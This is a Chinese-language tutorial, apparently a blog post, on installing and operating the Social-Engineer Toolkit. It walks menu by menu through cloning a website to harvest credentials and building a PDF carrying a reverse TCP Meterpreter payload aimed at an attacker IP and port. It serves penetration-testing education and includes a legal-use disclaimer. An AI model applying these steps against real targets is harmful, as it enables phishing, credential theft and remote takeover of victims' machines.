用心做分享,只为给您最好的学习教程
如果您觉得文章不错,欢迎持续学习
工具介绍
Social-Engineer Toolkit (SET) 是一个开源的渗透测试框架,专门用于进行社会工程学攻击。SET 由 TrustedSec 创始人 David Kennedy 开发,旨在模拟各种社会工程攻击,以帮助安全研究人员和系统管理员测试和提高系统的安全性。该工具支持多种攻击向量,包括钓鱼攻击、恶意文件生成、网站克隆等。
功能与特点
多种攻击向量:支持钓鱼攻击、恶意文件生成、网站克隆、短信钓鱼等多种社会工程攻击。模块化设计:具有模块化的架构,可以方便地添加、删除和更新攻击模块。自动化攻击:提供自动化攻击选项,简化了攻击过程,适合不同技术水平的用户。集成 Metasploit:与 Metasploit 框架集成,增强了攻击能力和可操作性。使用教程
以下是使用 Social-Engineer Toolkit 进行社会工程学攻击的详细教程。
步骤一:安装 SET
在 Kali Linux 上安装更新系统包管理器:
打开终端,运行以下命令更新系统包管理器:
sudo apt update
安装 SET:使用包管理器安装 SET:
sudo apt install set
启动 SET:安装完成后,启动 SET:sudo setoolkit
在其他 Linux 发行版上安装克隆 SET 仓库:
从 GitHub 仓库克隆 SET 源代码:
git clone https://github.com/trustedsec/social-engineer-toolkit.git
进入 SET 目录:cd social-engineer-toolkit
安装依赖:安装 SET 所需的依赖:sudo python3 setup.py install
启动 SET:安装完成后,启动 SET:sudo setoolkit
步骤二:使用 SET 进行钓鱼攻击选择攻击类型:
启动 SET 后,将看到一个菜单。选择“1) Social-Engineering Attacks”:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
Enter your choice: 1
选择攻击向量:选择“2) Website Attack Vectors”:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
Enter your choice: 2
选择具体攻击方法:选择“3) Credential Harvester Attack Method”:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
Enter your choice: 3
选择攻击模式:选择“2) Site Cloner”以克隆目标网站:
1) Web Templates
2) Site Cloner
3) Custom Import
Enter your choice: 2
输入目标 URL:输入要克隆的目标网站 URL,例如:
Enter the URL to clone: http://example.com
启动 Apache 服务器:SET 会提示你是否要启动 Apache 服务器,选择“yes”以继续:
Do you want to start the Apache server [yes|no]: yes
步骤三:监控和收集凭据监控收集的凭据:在攻击进行中,可以通过 SET 控制台监控收集到的凭据信息。所有输入的凭据将显示在终端中。
步骤四:生成恶意文件
选择攻击类型:
在 SET 主菜单中选择“1) Social-Engineering Attacks”:
Enter your choice: 1
选择攻击向量:选择“1) Spear-Phishing Attack Vectors”:
Enter your choice: 1
选择攻击方法:选择“2) Create a FileFormat Payload”:
Enter your choice: 2
选择攻击载荷:选择“5) Windows Reverse_TCP Meterpreter”:
Enter your choice: 5
设置监听主机和端口:设置攻击者的 IP 地址和监听端口,例如:
Enter the IP address (LHOST) for the payload: 192.168.1.100Enter the port (LPORT) for the payload: 4444
选择文件格式:选择“16) PDF Embedded EXE Social Engineering”:
Enter your choice: 16
生成文件:SET 将生成一个恶意 PDF 文件,发送给目标用户。当目标用户打开该文件时,攻击载荷将执行。
总结
Social-Engineer Toolkit (SET) 是一款功能强大的社会工程学攻击工具,通过其多种攻击向量和模块化设计,可以帮助安全研究人员和系统管理员测试和提高系统的安全性。本文详细介绍了 SET 的安装、钓鱼攻击和生成恶意文件的使用方法,帮助用户快速掌握该工具的使用技巧。在实际操作中,请务必遵守相关法律法规,仅在合法授权的情况下使用该工具。通过使用 SET,安全研究人员和系统管理员可以更加全面地了解系统的社会工程学攻击风险,及时采取措施,提高系统的整体安全性。本文仅作技术分享 切勿用于非法途径
